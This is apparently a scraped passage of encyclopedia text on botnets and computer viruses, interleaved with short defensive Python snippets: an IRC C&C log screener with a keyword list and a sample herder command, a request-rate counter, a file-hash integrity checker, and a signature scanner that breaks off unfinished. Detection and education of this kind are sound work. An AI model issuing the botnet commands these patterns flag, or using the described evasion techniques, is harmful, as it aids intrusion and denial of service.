connected to the Internet that has been compromised by a hacker, computer virus or trojan horse and can be used to perform malicious tasks under remote direction. Botnets of zombie computers are often used to spread e-mail spam and launch denial-of-service attacks (DDoS). Most owners of zombie computers are unaware that their system is being used in this way. Because the owner tends to be unaware, these computers are metaphorically compared to zombies. A coordinated DDoS attack by multiple botnet machines also resembles a zombie horde attack. 11 The process of stealing computing resources as a result of a system being joined to a "botnet" is sometimes referred to as "scrumping". 12 Global law enforcement agencies, with the DOJ and FBI, dismantled the 911 S5 botnet, responsible for $5.9 billion in theft and various cybercrimes. Chinese national YunHe Wang, charged with operating the botnet, faces up to 65 years in prison. Authorities seized $60 million in assets, including luxury items and properties. 13 Botnet command and control (C C) protocols have been implemented in a number of ways, from traditional IRC approaches to more sophisticated versions. Telnet botnets use a simple C C botnet protocol in which bots connect to the main command server to host the botnet. Bots are added to the botnet by using a scanning script, which runs on an external server and scans IP ranges for telnet and SSH server default logins. Once a login is found, the scanning server can infect it through SSH with malware, which pings the control server. IRC networks use simple, low bandwidth communication methods, making them widely used to host botnets. They tend to be relatively simple in construction and have been used with moderate success for coordinating DDoS attacks and spam campaigns while being able to continually switch channels to avoid being taken down. However, in some cases, merely blocking of certain keywords has proven effective in stopping IRC-based botnets. The RFC 1459 (IRC) standard is popular with botnets. 
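Building on the IRC command-and-control message format quoted above, a purely defensive sketch of keyword-based log screening may help; the keyword list, the sample line, and the assumption that logs arrive as raw RFC 1459 style messages are all illustrative, not taken from the article.

import re

# Suspicious terms sometimes seen in C&C channel topics or commands (illustrative list).
SUSPICIOUS = ("ddos", "flood", "botkill", "scan", "loader")

IRC_LINE = re.compile(r"^:(?P<sender>\S+)\s+(?P<command>TOPIC|PRIVMSG)\s+(?P<target>\S+)\s+(?P<text>.*)$")

def flag_irc_line(line):
    # Return (command, text) if the line looks like a C&C instruction, else None.
    match = IRC_LINE.match(line.strip())
    if not match:
        return None
    if any(term in match.group("text").lower() for term in SUSPICIOUS):
        return match.group("command"), match.group("text")
    return None

print(flag_irc_line(":herder!herder@example.com TOPIC #channel DDoS www.victim.com"))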
The first known popular botnet controller script, "MaXiTE Bot" was using IRC XDCC protocol for private control commands. One problem with using IRC is that each bot client must know the IRC server, port, and channel to be of any use to the botnet. Anti-malware organizations can detect and shut down these servers and channels, effectively halting the botnet attack. If this happens, clients are still infected, but they typically lie dormant since they have no way of receiving instructions. 8 To mitigate this problem, a botnet can consist of several servers or channels. If one of the servers or channels becomes disabled, the botnet simply switches to another. It is still possible to detect and disrupt additional botnet servers or channels by sniffing IRC traffic. A botnet adversary can even potentially gain knowledge of the control scheme and imitate the bot herder by issuing commands correctly. 14 Since most botnets using IRC networks and domains can be taken down with time, hackers have moved to P2P botnets with C C to make the botnet more resilient and resistant to termination. Some have also used encryption as a way to secure or lock down the botnet from others, most of the time when they use encryption it is public-key cryptography and has presented challenges in both implementing it and breaking it. Many large botnets tend to use domains rather than IRC in their construction (see Rustock botnet and Srizbi botnet). They are usually hosted with bulletproof hosting services. This is one of the earliest types of C C. A zombie computer accesses a specially-designed webpage or domain(s) which serves the list of controlling commands. The advantages of using web pages or domains as C C is that a large botnet can be effectively controlled and maintained with very simple code that can be readily updated. Disadvantages of using this method are that it uses a considerable amount of bandwidth at large scale, and domains can be quickly seized by government agencies with little effort. If the domains controlling the botnets are not seized, they are also easy targets to compromise with denial-of-service attacks. Fast-flux DNS can be used to make it difficult to track down the control servers, which may change from day to day. Control servers may also hop from DNS domain to DNS domain, with domain generation algorithms being used to create new DNS names for controller servers. Some botnets use free DNS hosting services such as DynDns.org, No-IP.com, and Afraid.org to point a subdomain towards an IRC server that harbors the bots. While these free DNS services do not themselves host attacks, they provide reference points (often hard-coded into the botnet executable). Removing such services can cripple an entire botnet. Calling back to popular sites 15 such as GitHub, 16 Twitter, 17 18 Reddit, 19 Instagram, 20 the XMPP open source instant message protocol 21 and Tor hidden services 22 are popular ways of avoiding egress filtering to communicate with a C C server. 23 This example illustrates how a botnet is created and used for malicious gain. Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community. 24 Computers can be co-opted into a botnet when they execute malicious software. 
This can be accomplished by luring users into making a drive-by download, exploiting web browser vulnerabilities, or by tricking the user into running a Trojan horse program, which may come from an email attachment. This malware will typically install modules that allow the computer to be commanded and controlled by the botnet's operator. After the software is downloaded, it will call home (send a reconnection packet) to the host computer. When the re-connection is made, depending on how it is written, a Trojan may then delete itself or may remain present to update and maintain the modules. In some cases, a botnet may be temporarily created by volunteer hacktivists, such as with implementations of the Low Orbit Ion Cannon as used by 4chan members during Project Chanology in 2010. 25 China's Great Cannon of China allows the modification of legitimate web browsing traffic at internet backbones into China to create a large ephemeral botnet to attack large targets such as GitHub in 2015. 26 The botnet controller community constantly competes over who has the most bots, the highest overall bandwidth, and the most "high-quality" infected machines, like university, corporate, and even government machines. 34 While botnets are often named after the malware that created them, multiple botnets typically use the same malware but are operated by different entities. 35 Botnets can be used for many electronic scams. These botnets can be used to distribute malware such as viruses to take control of a regular users computer software 36 By taking control of someone's personal computer they have unlimited access to their personal information, including passwords and login information to accounts. This is called phishing. Phishing is the acquiring of login information to the "victim's" accounts with a link the "victim" clicks on that is sent through an email or text. 37 A survey by Verizon found that around two-thirds of electronic "espionage" cases come from phishing. 38 The geographic dispersal of botnets means that each recruit must be individually identified corralled repaired and limits the benefits of filtering. Computer security experts have succeeded in destroying or subverting malware command and control networks, by, among other means, seizing servers or getting them cut off from the Internet, denying access to domains that were due to be used by malware to contact its C C infrastructure, and, in some cases, breaking into the C C network itself. 39 40 41 In response to this, C C operators have resorted to using techniques such as overlaying their C C networks on other existing benign infrastructure such as IRC or Tor, using peer-to-peer networking systems that are not dependent on any fixed servers, and using public key encryption to defeat attempts to break into or spoof the network. 42 Norton AntiBot was aimed at consumers, but most target enterprises and or ISPs. Host-based techniques use heuristics to identify bot behavior that has bypassed conventional anti-virus software. Network-based approaches tend to use the techniques described above; shutting down C C servers, null-routing DNS entries, or completely shutting down IRC servers. BotHunter is software, developed with support from the U.S. Army Research Office, that detects botnet activity within a network by analyzing network traffic and comparing it to patterns characteristic of malicious processes. 
Researchers at Sandia National Laboratories are analyzing botnets' behavior by simultaneously running one million Linux kernels—a similar scale to a botnet—as virtual machines on a 4,480 node high-performance computer cluster to emulate a very large network, allowing them to watch how botnets work and experiment with ways to stop them. 43 Detecting automated bot attacks is becoming more difficult each day as newer and more sophisticated generations of bots are getting launched by attackers. For example, an automated attack can deploy a large bot army and apply brute-force methods with highly accurate username and password lists to hack into accounts. The idea is to overwhelm sites with tens of thousands of requests from different IPs all over the world, but with each bot only submitting a single request every 10 minutes or so, which can result in more than 5 million attempts per day. 44 In these cases, many tools try to leverage volumetric detection, but automated bot attacks now have ways of circumventing triggers of volumetric detection. One of the techniques for detecting these bot attacks is what's known as "signature-based systems" in which the software will attempt to detect patterns in the request packet. However, attacks are constantly evolving, so this may not be a viable option when patterns cannot be discerned from thousands of requests. There is also the behavioral approach to thwarting bots, which ultimately tries to distinguish bots from humans. By identifying non-human behavior and recognizing known bot behavior, this process can be applied at the user, browser, and network levels. The most capable method of using software to combat against a virus has been to utilize honeypot software in order to convince the malware that a system is vulnerable. The malicious files are then analyzed using forensic software. On 15 July 2014, the Subcommittee on Crime and Terrorism of the Committee 45 on the Judiciary, United States Senate, held a hearing on the threats posed by botnets and the public and private efforts to disrupt and dismantle them. 46 The rise in vulnerable IoT devices has led to an increase in IoT-based botnet attacks. To address this, a novel network-based anomaly detection method for IoT called N-BaIoT was introduced. It captures network behavior snapshots and employs deep autoencoders to identify abnormal traffic from compromised IoT devices. The method was tested by infecting nine IoT devices with Mirai and BASHLITE botnets, showing its ability to accurately and promptly detect attacks originating from compromised IoT devices within a botnet. 47 Additionally, comparing different ways of detecting botnets is really useful for researchers. It helps them see how well each method works compared to others. This kind of comparison is good because it lets researchers evaluate the methods fairly and find ways to make them better. 48 The first botnet was first acknowledged and exposed by EarthLink during a lawsuit with notorious spammer Khan C. Smith 49 in 2001. The botnet was constructed for the purpose of bulk spam, and accounted for nearly 25% of all spam at the time. 50 Around 2006, to thwart detection, some botnets were scaling back in size. 51 |
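The "low and slow" pattern described above, with each bot submitting roughly one request every ten minutes, is exactly what defeats naive volumetric detection. A minimal sketch of a per-IP sliding-window counter, assuming request timestamps are available from an access log, shows why: each individual address stays far below any sensible threshold even though the aggregate runs into millions of attempts per day. The window size and threshold below are arbitrary assumptions.

from collections import defaultdict, deque

class SlidingWindowCounter:
    """Count requests per client IP over the last `window_seconds`.
    Illustrative only; real systems combine this with many other signals."""
    def __init__(self, window_seconds: float = 600.0, threshold: int = 20):
        self.window = window_seconds
        self.threshold = threshold
        self.events = defaultdict(deque)  # ip -> timestamps of recent requests

    def record(self, ip: str, timestamp: float) -> bool:
        """Record one request; return True if this IP now exceeds the threshold."""
        q = self.events[ip]
        q.append(timestamp)
        while q and timestamp - q[0] > self.window:
            q.popleft()
        return len(q) > self.threshold

counter = SlidingWindowCounter()
# A single bot submitting one attempt every 600 seconds never trips the alarm,
# even though thousands of such bots together generate millions of attempts per day.
for minute in range(0, 60, 10):
    print(counter.record("203.0.113.7", minute * 60.0))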
652 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_virus | A computer virus 1 is a type of malware that, when executed, replicates itself by modifying other computer programs and inserting its own code into those programs. 2 3 If this replication succeeds, the affected areas are then said to be "infected" with a computer virus, a metaphor derived from biological viruses. 4 Computer viruses generally require a host program. 5 The virus writes its own code into the host program. When the program runs, the written virus program is executed first, causing infection and damage. By contrast, a computer worm does not need a host program, as it is an independent program or code chunk. Therefore, it is not restricted by the host program, but can run independently and actively carry out attacks. 6 7 Virus writers use social engineering deceptions and exploit detailed knowledge of security vulnerabilities to initially infect systems and to spread the virus. Viruses use complex anti-detection stealth strategies to evade antivirus software. 8 Motives for creating viruses can include seeking profit (e.g., with ransomware), desire to send a political message, personal amusement, to demonstrate that a vulnerability exists in software, for sabotage and denial of service, or simply because they wish to explore cybersecurity issues, artificial life and evolutionary algorithms. 9 As of 2013, computer viruses caused billions of dollars' worth of economic damage each year. 10 In response, an industry of antivirus software has cropped up, selling or freely distributing virus protection to users of various operating systems. 11 The first academic work on the theory of self-replicating computer programs was done in 1949 by John von Neumann who gave lectures at the University of Illinois about the "Theory and Organization of Complicated Automata". The work of von Neumann was later published as the "Theory of self-reproducing automata". In his essay von Neumann described how a computer program could be designed to reproduce itself. 12 Von Neumann's design for a self-reproducing computer program is considered the world's first computer virus, and he is considered to be the theoretical "father" of computer virology. 13 In 1972, Veith Risak directly building on von Neumann's work on self-replication, published his article "Selbstreproduzierende Automaten mit minimaler Informations bertragung" (Self-reproducing automata with minimal information exchange). 14 The article describes a fully functional virus written in assembler programming language for a SIEMENS 4004 35 computer system. In 1980, J rgen Kraus wrote his Diplom thesis "Selbstreproduktion bei Programmen" (Self-reproduction of programs) at the University of Dortmund. 15 In his work Kraus postulated that computer programs can behave in a way similar to biological viruses. The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. 16 Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1971. 17 Creeper used the ARPANET to infect DEC PDP 10 computers running the TENEX operating system. 18 Creeper gained access via the ARPANET and copied itself to the remote system where the message, "I'M THE CREEPER. CATCH ME IF YOU CAN was displayed. 19 The Reaper program was created to delete Creeper. 
20 In 1982, a program called "Elk Cloner" was the first personal computer virus to appear "in the wild"—that is, outside the single computer or computer lab where it was created. 21 Written in 1981 by Richard Skrenta, a ninth grader at Mount Lebanon High School near Pittsburgh, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. 21 On its 50th use the Elk Cloner virus would be activated, infecting the personal computer and displaying a short poem beginning "Elk Cloner: The program with a personality. In 1984, Fred Cohen from the University of Southern California wrote his paper "Computer Viruses Theory and Experiments". 22 It was the first paper to explicitly call a self-reproducing program a "virus", a term introduced by Cohen's mentor Leonard Adleman. In 1987, Fred Cohen published a demonstration that there is no algorithm that can perfectly detect all possible viruses. 23 Fred Cohen's theoretical compression virus 24 was an example of a virus which was not malicious software (malware), but was putatively benevolent (well-intentioned). However, antivirus professionals do not accept the concept of "benevolent viruses", as any desired function can be implemented without involving a virus (automatic compression, for instance, is available under Windows at the choice of the user). Any virus will by definition make unauthorised changes to a computer, which is undesirable even if no damage is done or intended. The first page of Dr Solomon's Virus Encyclopaedia explains the undesirability of viruses, even those that do nothing but reproduce. 25 26 An article that describes "useful virus functionalities" was published by J. B. Gunn under the title "Use of virus functions to provide a virtual APL interpreter under user control" in 1984. 27 The first IBM PC compatible virus in the "wild" was a boot sector virus dubbed (c)Brain, 28 created in 1986 and was released in 1987 by Amjad Farooq Alvi and Basit Farooq Alvi in Lahore, Pakistan, reportedly to deter unauthorized copying of the software they had written. 29 The first virus to specifically target Microsoft Windows, WinVir was discovered in April 1992, two years after the release of Windows 3.0. 30 The virus did not contain any Windows API calls, instead relying on DOS interrupts. A few years later, in February 1996, Australian hackers from the virus-writing crew VLAD created the Bizatch virus (also known as "Boza" virus), which was the first known virus to target Windows 95. In late 1997 the encrypted, memory-resident stealth virus Win32.Cabanas was released—the first known virus that targeted Windows NT (it was also able to infect Windows 3.0 and Windows 9x hosts). 31 Even home computers were affected by viruses. The first one to appear on the Amiga was a boot sector virus called SCA virus, which was detected in November 1987. 32 A computer virus generally contains three parts: the infection mechanism, which finds and infects new files, the payload, which is the malicious code to execute, and the trigger, which determines when to activate the payload. 33 Virus phases is the life cycle of the computer virus, described by using an analogy to biology. This life cycle can be divided into four phases: Computer viruses infect a variety of different subsystems on their host computers and software. 
41 One manner of classifying viruses is to analyze whether they reside in binary executables (such as .EXE or .COM files), data files (such as Microsoft Word documents or PDF files), or in the boot sector of the host's hard drive (or some combination of all of these). 42 43 A memory-resident virus (or simply "resident virus") installs itself as part of the operating system when executed, after which it remains in RAM from the time the computer is booted up to when it is shut down. Resident viruses overwrite interrupt handling code or other functions, and when the operating system attempts to access the target file or disk sector, the virus code intercepts the request and redirects the control flow to the replication module, infecting the target. In contrast, a non-memory-resident virus (or "non-resident virus"), when executed, scans the disk for targets, infects them, and then exits (i.e. it does not remain in memory after it is done executing). 44 Many common applications, such as Microsoft Outlook and Microsoft Word, allow macro programs to be embedded in documents or emails, so that the programs may be run automatically when the document is opened. A macro virus (or "document virus") is a virus that is written in a macro language and embedded into these documents so that when users open the file, the virus code is executed, and can infect the user's computer. This is one of the reasons that it is dangerous to open unexpected or suspicious attachments in e-mails. 45 46 While not opening attachments in e-mails from unknown persons or organizations can help to reduce the likelihood of contracting a virus, in some cases, the virus is designed so that the e-mail appears to be from a reputable organization (e.g., a major bank or credit card company). Boot sector viruses specifically target the boot sector and or the Master Boot Record 47 (MBR) of the host's hard disk drive, solid-state drive, or removable storage media (flash drives, floppy disks, etc.). 48 The most common way of transmission of computer viruses in boot sector is physical media. When reading the VBR of the drive, the infected floppy disk or USB flash drive connected to the computer will transfer data, and then modify or replace the existing boot code. The next time a user tries to start the desktop, the virus will immediately load and run as part of the master boot record. 49 Email viruses are viruses that intentionally, rather than accidentally, use the email system to spread. While virus infected files may be accidentally sent as email attachments, email viruses are aware of email system functions. They generally target a specific type of email system (Microsoft Outlook is the most commonly used), harvest email addresses from various sources, and may append copies of themselves to all email sent, or may generate email messages containing copies of themselves as attachments. 50 To avoid detection by users, some viruses employ different kinds of deception. Some old viruses, especially on the DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach does not fool antivirus software, however, especially those which maintain and date cyclic redundancy checks on file changes. 51 Some viruses can infect files without increasing their sizes or damaging the files. They accomplish this by overwriting unused areas of executable files. These are called cavity viruses. For example, the CIH virus, or Chernobyl Virus, infects Portable Executable files. 
Because those files have many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file. 52 Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them (for example, Conficker). A Virus may also hide its presence using a rootkit by not showing itself on the list of system processes or by disguising itself within a trusted process. 53 In the 2010s, as computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced. Defending a computer against viruses may demand that a file system migrate towards detailed and explicit permission for every kind of file access. citation needed In addition, only a small fraction of known viruses actually cause real incidents, primarily because many viruses remain below the theoretical epidemic threshold. 54 While some kinds of antivirus software employ various techniques to counter stealth mechanisms, once the infection occurs any recourse to "clean" the system is unreliable. In Microsoft Windows operating systems, the NTFS file system is proprietary. This leaves antivirus software little alternative but to send a "read" request to Windows files that handle such requests. Some viruses trick antivirus software by intercepting its requests to the operating system. A virus can hide by intercepting the request to read the infected file, handling the request itself, and returning an uninfected version of the file to the antivirus software. The interception can occur by code injection of the actual operating system files that would handle the read request. Thus, an antivirus software attempting to detect the virus will either not be permitted to read the infected file, or, the "read" request will be served with the uninfected version of the same file. 55 The only reliable method to avoid "stealth" viruses is to boot from a medium that is known to be "clear". Security software can then be used to check the dormant operating system files. Most security software relies on virus signatures, or they employ heuristics. 56 57 Security software may also use a database of file "hashes" for Windows OS files, so the security software can identify altered files, and request Windows installation media to replace them with authentic versions. In older versions of Windows, file cryptographic hash functions of Windows OS files stored in Windows—to allow file integrity authenticity to be checked—could be overwritten so that the System File Checker would report that altered system files are authentic, so using file hashes to scan for altered files would not always guarantee finding an infection. 58 Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. 59 Different antivirus programs will employ different search methods when identifying viruses. If a virus scanner finds such a pattern in a file, it will perform other checks to make sure that it has found the virus, and not merely a coincidental sequence in an innocent file, before it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult but probably not impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus. 
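The database of file hashes mentioned a few sentences above can be illustrated with a short sketch: record a baseline of cryptographic hashes for files you trust, then re-hash them later and report anything that changed or disappeared. The directory path and baseline filename below are placeholders, and a real integrity checker would also protect the baseline itself from tampering, which is the weakness the article notes for older versions of Windows.

import hashlib
import json
from pathlib import Path

def hash_file(path: Path) -> str:
    """Return the SHA-256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(directory: str, baseline_file: str = "baseline.json") -> None:
    """Hash every file under `directory` and store the results as a baseline."""
    baseline = {str(p): hash_file(p) for p in Path(directory).rglob("*") if p.is_file()}
    Path(baseline_file).write_text(json.dumps(baseline, indent=2))

def check_against_baseline(baseline_file: str = "baseline.json") -> list:
    """Re-hash every file in the baseline and return those that changed or vanished."""
    baseline = json.loads(Path(baseline_file).read_text())
    altered = []
    for path, expected in baseline.items():
        p = Path(path)
        if not p.is_file() or hash_file(p) != expected:
            altered.append(path)
    return altered

# Example usage (paths are placeholders):
# build_baseline("./my_programs")
# print(check_against_baseline())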
citation needed One method of evading signature detection is to use simple encryption to encipher (encode) the body of the virus, leaving only the encryption module and a static cryptographic key in cleartext which does not change from one infection to the next. 60 In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Since these would be symmetric keys, stored on the infected host, it is entirely possible to decrypt the final virus, but this is probably not required, since self-modifying code is such a rarity that finding some may be reason enough for virus scanners to at least "flag" the file as suspicious. citation needed An old but compact way will be the use of arithmetic operation like addition or subtraction and the use of logical conditions such as XORing, 61 where each byte in a virus is with a constant so that the exclusive-or operation had only to be repeated for decryption. It is suspicious for a code to modify itself, so the code to do the encryption decryption may be part of the signature in many virus definitions. citation needed A simpler older approach did not use a key, where the encryption consisted only of operations with no parameters, like incrementing and decrementing, bitwise rotation, arithmetic negation, and logical NOT. 61 Some viruses, called polymorphic viruses, will employ a means of encryption inside an executable in which the virus is encrypted under certain events, such as the virus scanner being disabled for updates or the computer being rebooted. 62 This is called cryptovirology. Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses, however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts which remain identical between infections, making it very difficult to detect directly using "signatures". 63 64 Antivirus software can detect it by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called "mutating engine" or "mutation engine") somewhere in its encrypted body. See polymorphic code for technical detail on how such engines operate. 65 Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for antivirus professionals and investigators to obtain representative samples of the virus, because "bait" files that are infected in one run will typically contain identical or similar samples of the virus. 
This will make it more likely that the detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection. To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that utilize this technique are said to be in metamorphic code. To enable metamorphism, a "metamorphic engine" is needed. A metamorphic virus is usually very large and complex. For example, W32 Simile consisted of over 14,000 lines of assembly language code, 90% of which is part of the metamorphic engine. 66 67 Damage is due to causing system failure, corrupting data, wasting computer resources, increasing maintenance costs or stealing personal information. 10 Even though no antivirus software can uncover all computer viruses (especially new ones), computer security researchers are actively searching for new ways to enable antivirus solutions to more effectively detect emerging viruses, before they become widely distributed. 68 A power virus is a computer program that executes specific machine code to reach the maximum CPU power dissipation (thermal energy output for the central processing units). 69 Computer cooling apparatus are designed to dissipate power up to the thermal design power, rather than maximum power, and a power virus could cause the system to overheat if it does not have logic to stop the processor. This may cause permanent physical damage. Power viruses can be malicious, but are often suites of test software used for integration testing and thermal testing of computer components during the design phase of a product, or for product benchmarking. 70 Stability test applications are similar programs which have the same effect as power viruses (high CPU usage) but stay under the user's control. They are used for testing CPUs, for example, when overclocking. Spinlock in a poorly written program may cause similar symptoms, if it lasts sufficiently long. Different micro-architectures typically require different machine code to hit their maximum power. Examples of such machine code do not appear to be distributed in CPU reference materials. 71 As software is often designed with security features to prevent unauthorized use of system resources, many viruses must exploit and manipulate security bugs, which are security defects in a system or application software, to spread themselves and infect other computers. Software development strategies that produce large numbers of "bugs" will generally also produce potential exploitable "holes" or "entrances" for the virus. To replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs (see code injection). If a user attempts to launch an infected program, the virus' code may be executed simultaneously. 72 In operating systems that use file extensions to determine program associations (such as Microsoft Windows), the extensions may be hidden from the user by default. This makes it possible to create a file that is of a different type than it appears to the user. For example, an executable may be created and named "picture.png.exe", in which the user sees only "picture.png" and therefore assumes that this file is a digital image and most likely is safe, yet when opened, it runs the executable on the client machine. 73 Viruses may be installed on removable media, such as flash drives. 
The drives may be left in a parking lot of a government building or other target, with the hopes that curious users will insert the drive into a computer. In a 2015 experiment, researchers at the University of Michigan found that 45 98 percent of users would plug in a flash drive of unknown origin. 74 The vast majority of viruses target systems running Microsoft Windows. This is due to Microsoft's large market share of desktop computer users. 75 The diversity of software systems on a network limits the destructive potential of viruses and malware. a Open-source operating systems such as Linux allow users to choose from a variety of desktop environments, packaging tools, etc., which means that malicious code targeting any of these systems will only affect a subset of all users. Many Windows users are running the same set of applications, enabling viruses to rapidly spread among Microsoft Windows systems by targeting the same exploits on large numbers of hosts. 76 77 78 79 While Linux and Unix in general have always natively prevented normal users from making changes to the operating system environment without permission, Windows users are generally not prevented from making these changes, meaning that viruses can easily gain control of the entire system on Windows hosts. This difference has continued partly due to the widespread use of administrator accounts in contemporary versions like Windows XP. In 1997, researchers created and released a virus for Linux—known as "Bliss". 80 Bliss, however, requires that the user run it explicitly, and it can only infect programs that the user has the access to modify. Unlike Windows users, most Unix users do not log in as an administrator, or "root user", except to install or configure software; as a result, even if a user ran the virus, it could not harm their operating system. The Bliss virus never became widespread, and remains chiefly a research curiosity. Its creator later posted the source code to Usenet, allowing researchers to see how it worked. 81 Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. Personal computers of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the "wild" for many years. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in bulletin board system (BBS), modem use, and software sharing. Bulletin board driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBSs. 82 83 Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by other computers. 84 Macro viruses have become common since the mid 1990s. 
Most of these viruses are written in the scripting languages for Microsoft programs such as Microsoft Word and Microsoft Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected email messages, those viruses which did take advantage of the Microsoft Outlook Component Object Model (COM) interface. 85 86 Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus unique from the "parents". 87 A virus may also send a web address link as an instant message to all the contacts (e.g., friends and colleagues' e-mail addresses) stored on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. 88 Viruses that spread using cross-site scripting were first reported in 2002, 89 and were academically demonstrated in 2005. 90 There have been multiple instances of the cross-site scripting viruses in the "wild", exploiting websites such as MySpace (with the Samy worm) and Yahoo . In 1989 The ADAPSO Software Industry Division published Dealing With Electronic Vandalism, 91 in which they followed the risk of data loss by "the added risk of losing customer confidence. 92 93 94 Many users install antivirus software that can detect and eliminate known viruses when the computer attempts to download or run the executable file (which may be distributed as an email attachment, or on USB flash drives, for example). Some antivirus software blocks known malicious websites that attempt to install malware. Antivirus software does not change the underlying capability of hosts to transmit viruses. Users must update their software regularly to patch security vulnerabilities ("holes"). Antivirus software also needs to be regularly updated to recognize the latest threats. This is because malicious hackers and other individuals are always creating new viruses. The German AV-TEST Institute publishes evaluations of antivirus software for Windows 95 and Android. 96 Examples of Microsoft Windows anti virus and anti-malware software include the optional Microsoft Security Essentials 97 (for Windows XP, Vista and Windows 7) for real-time protection, the Windows Malicious Software Removal Tool 98 (now included with Windows (Security) Updates on "Patch Tuesday", the second Tuesday of each month), and Windows Defender (an optional download in the case of Windows XP). 99 Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use). 100 Some such free programs are almost as good as commercial competitors. 101 Common security vulnerabilities are assigned CVE IDs and listed in the US National Vulnerability Database. Secunia PSI 102 is an example of software, free for personal use, that will check a PC for vulnerable out-of-date software, and attempt to update it. Ransomware and phishing scam alerts appear as press releases on the Internet Crime Complaint Center noticeboard. 
Ransomware is a virus that posts a message on the user's screen saying that the screen or system will remain locked or unusable until a ransom payment is made. Phishing is a deception in which the malicious individual pretends to be a friend, computer security expert, or other benevolent individual, with the goal of convincing the targeted individual to reveal passwords or other personal information. Other commonly used preventive measures include timely operating system updates, software updates, careful Internet browsing (avoiding shady websites), and installation of only trusted software. 103 Certain browsers flag sites that have been reported to Google and that have been confirmed as hosting malware by Google. 104 105 There are two common methods that an antivirus software application uses to detect viruses, as described in the antivirus software article. The first, and by far the most common method of virus detection is using a list of virus signature definitions. This works by examining the content of the computer's memory (its Random Access Memory (RAM), and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives, or USB flash drives), and comparing those files against a database of known virus "signatures". Virus signatures are just strings of code that are used to identify individual viruses; for each virus, the antivirus designer tries to choose a unique signature string that will not be found in a legitimate program. Different antivirus programs use different "signatures" to identify viruses. The disadvantage of this detection method is that users are only protected from viruses that are detected by signatures in their most recent virus definition update, and not protected from new viruses (see "zero-day attack"). 106 A second method to find viruses is to use a heuristic algorithm based on common virus behaviors. This method can detect new viruses for which antivirus security firms have yet to define a "signature", but it also gives rise to more false positives than using signatures. False positives can be disruptive, especially in a commercial environment, because it may lead to a company instructing staff not to use the company computer system until IT services have checked the system for viruses. This can slow down productivity for regular workers. One may reduce the damage done by viruses by making regular backups of data (and the operating systems) on different media, that are either kept unconnected to the system (most of the time, as in a hard drive), read-only or not accessible for other reasons, such as using different file systems. This way, if data is lost through a virus, one can start again using the backup (which will hopefully be recent). 107 If a backup session on optical media like CD and DVD is closed, it becomes read-only and can no longer be affected by a virus (so long as a virus or infected file was not copied onto the CD DVD). Likewise, an operating system on a bootable CD can be used to start the computer if the installed operating systems become unusable. Backups on removable media must be carefully inspected before restoration. The Gammima virus, for example, propagates via removable flash drives. 108 109 Many websites run by antivirus software companies provide free online virus scanning, with limited "cleaning" facilities (after all, the purpose of the websites is to sell antivirus products and services). 
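A toy version of the signature scan described above is easy to sketch: read each file's bytes and look for known byte patterns. The signature database here is a made-up placeholder, not real virus signatures, and production scanners add much more (wildcards, hashes, heuristics, emulation) to keep false positives down.

from pathlib import Path

# Placeholder signature database: name -> byte pattern (not real virus signatures)
SIGNATURES = {
    "Example.TestPattern.A": b"\xde\xad\xbe\xef\x13\x37",
    "Example.TestPattern.B": b"HELLO-THIS-IS-A-FAKE-SIGNATURE",
}

def scan_file(path: Path) -> list:
    """Return the names of all signatures whose byte pattern occurs in the file."""
    data = path.read_bytes()
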